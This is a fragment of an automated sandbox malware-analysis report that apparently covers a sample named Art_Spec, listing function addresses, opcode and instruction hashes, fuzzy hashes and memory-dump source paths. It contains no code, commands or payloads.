                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                        • Instruction ID: 6b701d2673a6cc229cbe760521d56c3d5d0f8041dec1d1b13db1a172136cf8d5
                                                        • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                        • Instruction Fuzzy Hash: B2C04879705A428FCF16DB2ED298F8A77E4FB44B44F1548A4E805DBB22E635FC11CA10
                                                        Function 013F4340 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 315b56235793a4ff83693dd552e47942ded2f97b60770189c501ba2b76daffa8
                                                        • Instruction ID: 8469c1706fcb50e79350726d4c7b0ccf0aa039624c279d16d40117a3b06a1b88
                                                        • Opcode Fuzzy Hash: 315b56235793a4ff83693dd552e47942ded2f97b60770189c501ba2b76daffa8
                                                        • Instruction Fuzzy Hash: A7900231A15C01529141715949845464005A7F0301B55C022E0424599CCB348A965761
                                                        Function 013F4650 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b00f7ee34179cccd38fafb43b98e32f235d2ffdd87bd332cabed24ad562e101e
                                                        • Instruction ID: 33c75decb325abbf84cbd9190303221393f2cde13f4fe1e5c18940c8e07ad830
                                                        • Opcode Fuzzy Hash: b00f7ee34179cccd38fafb43b98e32f235d2ffdd87bd332cabed24ad562e101e
                                                        • Instruction Fuzzy Hash: 17900261A11901824141715949044066005A7F1301395C126A05545A5CC73889959769
                                                        Function 013F2BA0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0172a97c8cc9fb7ba94f456c6be15e650d6867c27d4d0cc00f544d8bd074179d
                                                        • Instruction ID: b96ad40fe35e8bebdf48de07c67f251601ae7d362cd7117d4dbeb59ce0b994a5
                                                        • Opcode Fuzzy Hash: 0172a97c8cc9fb7ba94f456c6be15e650d6867c27d4d0cc00f544d8bd074179d
                                                        • Instruction Fuzzy Hash: 55900231A1580942D15171594514746000597E0301F55C022A0024699DC7758B957BA1
                                                        Function 013F2B80 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: abbb7940e2c32701ff455b4e36f7cb13125a7e54e5e1819b2cd585a73c37b3ff
                                                        • Instruction ID: 28e5ec760b18d01cca8f8be5cd3875bb9f306357cd2faa592a70dbc62ecdec59
                                                        • Opcode Fuzzy Hash: abbb7940e2c32701ff455b4e36f7cb13125a7e54e5e1819b2cd585a73c37b3ff
                                                        • Instruction Fuzzy Hash: 3A90023161180942D10571594904686000597E0301F55C022A602469AED77589D17631
                                                        Function 013F2BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9a4d2e2a829355d9e8d2ea84772a699bd1bad711a484aa17fce7e11ee2075261
                                                        • Instruction ID: 9dd3d6852a32a5dc1681b0446b91f4ea8ada641ffe62a0c62f8b351ad2be71a0
                                                        • Opcode Fuzzy Hash: 9a4d2e2a829355d9e8d2ea84772a699bd1bad711a484aa17fce7e11ee2075261
                                                        • Instruction Fuzzy Hash: 2E90023161180942D1817159450464A000597E1301F95C026A0025699DCB358B997BA1
                                                        Function 013F2BE0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e11263f7bad6ce8444b5475dfedb57d9781d1869519df45fb1d946accfd98f8b
                                                        • Instruction ID: d33fa0c9382c139496f0553caab48c15a7bc1822531a1f54af83d45ddc3379b8
                                                        • Opcode Fuzzy Hash: e11263f7bad6ce8444b5475dfedb57d9781d1869519df45fb1d946accfd98f8b
                                                        • Instruction Fuzzy Hash: 0D90023161584982D14171594504A46001597E0305F55C022A00646D9DD7358E95BB61
                                                        Function 013F2AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 486307118a430810d6ee875a7382dbd2f39c399b69afeeac4b5f6e607a6e439c
                                                        • Instruction ID: 65ab20091e75a018b813950cdd6c67e4537c653f0f97551cbed0d0a019e18c1e
                                                        • Opcode Fuzzy Hash: 486307118a430810d6ee875a7382dbd2f39c399b69afeeac4b5f6e607a6e439c
                                                        • Instruction Fuzzy Hash: 169002A1611941D24501B2598504B0A450597F0201B55C027E10545A5CC63589919635
                                                        Function 013F2AF0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3dcfda585560fe09f4163377864a0c14ec17689b54e04f0460cca8731aa912b1
                                                        • Instruction ID: 15214d5a2468f97fa5b82da981066b10f284d1a7a360b69c633bea709f235a40
                                                        • Opcode Fuzzy Hash: 3dcfda585560fe09f4163377864a0c14ec17689b54e04f0460cca8731aa912b1
                                                        • Instruction Fuzzy Hash: 37900225631801420146B559070450B0445A7E6351395C026F14165D5CC73189A55721
                                                        Function 013F2AD0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b2218faa09ebe26234943c544ffabbafc8a17aee03803644d226be50c7dc1afe
                                                        • Instruction ID: b94ff99e4ae1cf3893ccb3da1d07755c33cba2f4c002eceb066e6a52469c29f0
                                                        • Opcode Fuzzy Hash: b2218faa09ebe26234943c544ffabbafc8a17aee03803644d226be50c7dc1afe
                                                        • Instruction Fuzzy Hash: 4F900225621801430106B5590704507004697E5351355C032F1015595CD73189A15621
                                                        Function 013F2D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2a095cb38ca433d3508dee535f10912eff9a6ab77af6e71cf74236239f02510d
                                                        • Instruction ID: 1a73d034470c272ec62f72be95b3df8f1b9e506cb41fd57f39028bdb9bc80c12
                                                        • Opcode Fuzzy Hash: 2a095cb38ca433d3508dee535f10912eff9a6ab77af6e71cf74236239f02510d
                                                        • Instruction Fuzzy Hash: 1990022171180143D141715955186064005E7F1301F55D022E0414599CDA3589965722
                                                        Function 013F2D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0a3e9d628daddd4a5c7b3c783b0aee48db092d28d1c6cadd91bb84d07f7615c6
                                                        • Instruction ID: 77900da0c02f8d5bed2c7325aef9f96b2ca3627c205a286beeed864687099072
                                                        • Opcode Fuzzy Hash: 0a3e9d628daddd4a5c7b3c783b0aee48db092d28d1c6cadd91bb84d07f7615c6
                                                        • Instruction Fuzzy Hash: C990022962380142D1817159550860A000597E1202F95D426A001559DCCA3589A95721
                                                        Function 013F2D00 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ebb8bd70de23cb6c9dcee17e4e55b0209365d34de0df70830e0dd77284c59450
                                                        • Instruction ID: a7952a107aea66a7cd87766fee67fd4af5745959eb5bbcb6891a6b66621189fd
                                                        • Opcode Fuzzy Hash: ebb8bd70de23cb6c9dcee17e4e55b0209365d34de0df70830e0dd77284c59450
                                                        • Instruction Fuzzy Hash: 3390022161584582D10175595508A06000597E0205F55D022A10645DADC7358991A631
                                                        Function 013F2DB0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bab8b18b770c2c1fe4a2bb4c878972c18155beca60b4ce096360867348c65342
                                                        • Instruction ID: 3af549ea60d6b52ff773385fefc78c2028f9bcc24c641735d7faa73b405e07be
                                                        • Opcode Fuzzy Hash: bab8b18b770c2c1fe4a2bb4c878972c18155beca60b4ce096360867348c65342
                                                        • Instruction Fuzzy Hash: A390023165180542D142715945046060009A7E0241F95C023A0424599EC7758B96AF61
                                                        Function 013F2DD0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 72cde6163dae4f3f70a6ba2d8bd77392838c8edf73eeb2587db24ab7ade9bdcb
                                                        • Instruction ID: ae56a6fc7267ee771b6fd9efa93172b67a0dd7ace343ebfed6081d6e1a7f7561
                                                        • Opcode Fuzzy Hash: 72cde6163dae4f3f70a6ba2d8bd77392838c8edf73eeb2587db24ab7ade9bdcb
                                                        • Instruction Fuzzy Hash: D9900221652842925546B15945045074006A7F0241795C023A1414995CC6369996DB21
                                                        Function 013F2C60 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a7cbee4deec236d4425c5b16431b8ee10c1851e7d040ff56d6b0db5d9f266ac0
                                                        • Instruction ID: ba6cecc19f339aca31390c538274fe0752e5b7287e384e9f3eccad53184dabb9
                                                        • Opcode Fuzzy Hash: a7cbee4deec236d4425c5b16431b8ee10c1851e7d040ff56d6b0db5d9f266ac0
                                                        • Instruction Fuzzy Hash: 1A90023161180982D10171594504B46000597F0301F55C027A0124699DC735C9917A21
                                                        Function 013F2CA0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 629aba4f87020cc04c501b4c1f5e0876edfc5168b70f85239aba709ecbce8861
                                                        • Instruction ID: f3e51471236954a8844cd96be8afc5d239b5dbb3e72e5230e4107833c4f73e97
                                                        • Opcode Fuzzy Hash: 629aba4f87020cc04c501b4c1f5e0876edfc5168b70f85239aba709ecbce8861
                                                        • Instruction Fuzzy Hash: E590023161180542D10175995508646000597F0301F55D022A502459AEC77589D16631
                                                        Function 013F2CF0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 28e2c91276b9c188a0739f7d5e0f476b97b442e9f02a50141151f61f50310753
                                                        • Instruction ID: 753c5fd15aa66a9bdb35fe970e931007f48f93b3630c73d705e2de8876551e77
                                                        • Opcode Fuzzy Hash: 28e2c91276b9c188a0739f7d5e0f476b97b442e9f02a50141151f61f50310753
                                                        • Instruction Fuzzy Hash: 3A90023161180543D10171595608707000597E0201F55D422A042459DDD77689916621
                                                        Function 013F2CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b52a326b3546928e2d6b18e3a03cfa4ac46dafa42f61b4c2787f559b9c20014c
                                                        • Instruction ID: 9fa4e54edd74b412fdf0c5df0fc9c53f4f7a3c332cc74be897372181559e2dde
                                                        • Opcode Fuzzy Hash: b52a326b3546928e2d6b18e3a03cfa4ac46dafa42f61b4c2787f559b9c20014c
                                                        • Instruction Fuzzy Hash: 9E900221A1580542D14171595518706001597E0201F55D022A0024599DC7798B956BA1
                                                        Function 013F2F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ad21fef94bac7f0e79fb4939eb4f24c05dbbbdd16aa91b6548710ab53a1d94a6
                                                        • Instruction ID: fb92b34038529c54098faeb211e5e05ff32b140b6076f0cb61388313516acff6
                                                        • Opcode Fuzzy Hash: ad21fef94bac7f0e79fb4939eb4f24c05dbbbdd16aa91b6548710ab53a1d94a6
                                                        • Instruction Fuzzy Hash: 3890026175180582D10171594514B060005D7F1301F55C026E1064599DC739CD926626
                                                        Function 013F2F60 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1103f37c585e65fb2b523d52210dc0ad494f41013091e17d69161c8b0507eca8
                                                        • Instruction ID: affdeab2f724a0c5912e178e8a8c41035c687710df746d5e138ed948ddc4cd77
                                                        • Opcode Fuzzy Hash: 1103f37c585e65fb2b523d52210dc0ad494f41013091e17d69161c8b0507eca8
                                                        • Instruction Fuzzy Hash: D390026162180182D10571594504706004597F1201F55C023A2154599CC6398DA15625
                                                        Function 013F2FB0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 828b5acacdfa36c9fbb949f903d4449613c81e7b35289ee2dd40660ede63364b
                                                        • Instruction ID: c2b5fc2d5a20dbc90f76d067d55e38de03c518b919734ca72a028cb1cf4b5cb0
                                                        • Opcode Fuzzy Hash: 828b5acacdfa36c9fbb949f903d4449613c81e7b35289ee2dd40660ede63364b
                                                        • Instruction Fuzzy Hash: E0900221A11801824141716989449064005BBF1211755C132A0998595DC67989A55B65
                                                        Function 013F2FA0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2266a76b47d3bf2a2d0d6f194ac9cb033b7ac89f5ed6cc41bb9c29e78cc15f1f
                                                        • Instruction ID: a1091cbeb686316517bc844c5b2e529672ff1e15a1f8768d77cf280f47c138f2
                                                        • Opcode Fuzzy Hash: 2266a76b47d3bf2a2d0d6f194ac9cb033b7ac89f5ed6cc41bb9c29e78cc15f1f
                                                        • Instruction Fuzzy Hash: 66900231611C0542D10171594908747000597E0302F55C022A516459AEC775C9D16A31
                                                        Function 013F2F90 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 77d5fdf32d889c85e7123603595057a7bef3e6d3636ca9e9617c98da67963b6d
                                                        • Instruction ID: a7c696121c9ce28c566e8f2a823ff29dd7cadda9083a310d9dc51ad92fc3f755
                                                        • Opcode Fuzzy Hash: 77d5fdf32d889c85e7123603595057a7bef3e6d3636ca9e9617c98da67963b6d
                                                        • Instruction Fuzzy Hash: 2E900231611C0542D1017159491470B000597E0302F55C022A116459ADC73589916A71
                                                        Function 013F2FE0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cc1187fdac668db936ee0ec9bca2f1f97f7f15f4d3c2bcbcff0047bf87a88e21
                                                        • Instruction ID: b759bf00f82472ca03463fdc274b13b8128b21af2243890893ae4fbf17d392d6
                                                        • Opcode Fuzzy Hash: cc1187fdac668db936ee0ec9bca2f1f97f7f15f4d3c2bcbcff0047bf87a88e21
                                                        • Instruction Fuzzy Hash: 4B900221621C0182D20175694D14B07000597E0303F55C126A0154599CCA3589A15A21
                                                        Function 013F2E30 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9cad8e289d5f6c99701f0e10c218dc21be724928e7637dd8a5f10eeac9c364f0
                                                        • Instruction ID: 90330c20661c63f0ac9b86242fa71860f4210550e732bd6e1a9af00a2efaad45
                                                        • Opcode Fuzzy Hash: 9cad8e289d5f6c99701f0e10c218dc21be724928e7637dd8a5f10eeac9c364f0
                                                        • Instruction Fuzzy Hash: CB90022171180542D103715945146060009D7E1345F95C023E142459ADC7358A93A632
                                                        Function 013F2EA0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6baadb38c815acfd41156cf3241b88e2f11f97e86d70f2d39bdd9235a0e3aa97
                                                        • Instruction ID: d60d58dc601e7c5d857c73e2f9e4762801d51b0af1150357633be40b7a96df7b
                                                        • Opcode Fuzzy Hash: 6baadb38c815acfd41156cf3241b88e2f11f97e86d70f2d39bdd9235a0e3aa97
                                                        • Instruction Fuzzy Hash: 0B90027161180542D14171594504746000597E0301F55C022A5064599EC7798ED56B65
                                                        Function 013F2E80 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2c532ceadafe775573fa0acf4455da864b0a68356b5ef2935d6e608f65ffe58a
                                                        • Instruction ID: 5bda666a619403412e6fef4579ff928c7c6938de5f9018f84788daef187ef303
                                                        • Opcode Fuzzy Hash: 2c532ceadafe775573fa0acf4455da864b0a68356b5ef2935d6e608f65ffe58a
                                                        • Instruction Fuzzy Hash: 2D900221A1180642D10271594504616000A97E0241F95C033A102459AECB358AD2A631
                                                        Function 013F2EE0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 71296ffb3c4f9be620fddc2bad126d3ae3d7cfcd0b2a9e187cac689105b69932
                                                        • Instruction ID: 5402445b3ace3a1da0fe62cd1424fcce05f216c351e1132ed56542df47d6df06
                                                        • Opcode Fuzzy Hash: 71296ffb3c4f9be620fddc2bad126d3ae3d7cfcd0b2a9e187cac689105b69932
                                                        • Instruction Fuzzy Hash: 59900261611C0543D14175594904607000597E0302F55C022A206459AECB398D916635
                                                        Function 013F3010 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: eb2c0aefab2774f8efb7948ad7096eaa7d3f4c0676fe3d5245457c29fa918cd6
                                                        • Instruction ID: 89e2eaa11390b30660717246aa9444964a4284c5bc96abf6ee458975ea2d2151
                                                        • Opcode Fuzzy Hash: eb2c0aefab2774f8efb7948ad7096eaa7d3f4c0676fe3d5245457c29fa918cd6
                                                        • Instruction Fuzzy Hash: 17900221611C4582D14172594904B0F410597F1202F95C02AA4156599CCA3589955B21
                                                        Function 013F3090 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 33521097ac396ee985c714fe3da55397a4b27f815dd371e7881f5c75bb71f5e7
                                                        • Instruction ID: 58bb3377fcd5e9d9ace7bfc92bf1e2f4d22637031f6f1550a5077231ddd654d5
                                                        • Opcode Fuzzy Hash: 33521097ac396ee985c714fe3da55397a4b27f815dd371e7881f5c75bb71f5e7
                                                        • Instruction Fuzzy Hash: C490022165180942D141715985147070006D7E0601F55C022A0024599DC7368AA56BB1
                                                        Function 013F39B0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7afd2569c607fa7087656b0dee9c7b7fa4e82ac553f87ca788d43d4621ed106a
                                                        • Instruction ID: 04190991d24e56e217bd33ca31ecfc8ac14408b18a35db71920830b364cde46e
                                                        • Opcode Fuzzy Hash: 7afd2569c607fa7087656b0dee9c7b7fa4e82ac553f87ca788d43d4621ed106a
                                                        • Instruction Fuzzy Hash: FF90022165585242D151715D45046164005B7F0201F55C032A08145D9DC67589956721
                                                        Function 013F3D10 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 079800e406bf3852353c7496a7d5395e7ca6d454c50807a16a0df7f8eb131d23
                                                        • Instruction ID: c0b61582e1b32f655ed733ececc800e056ca20837d3d7696f6b57bfb1b20af7e
                                                        • Opcode Fuzzy Hash: 079800e406bf3852353c7496a7d5395e7ca6d454c50807a16a0df7f8eb131d23
                                                        • Instruction Fuzzy Hash: F290023161280282954172595904A4E410597F1302B95D426A0015599CCA3489A15721
                                                        Function 013F3D70 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
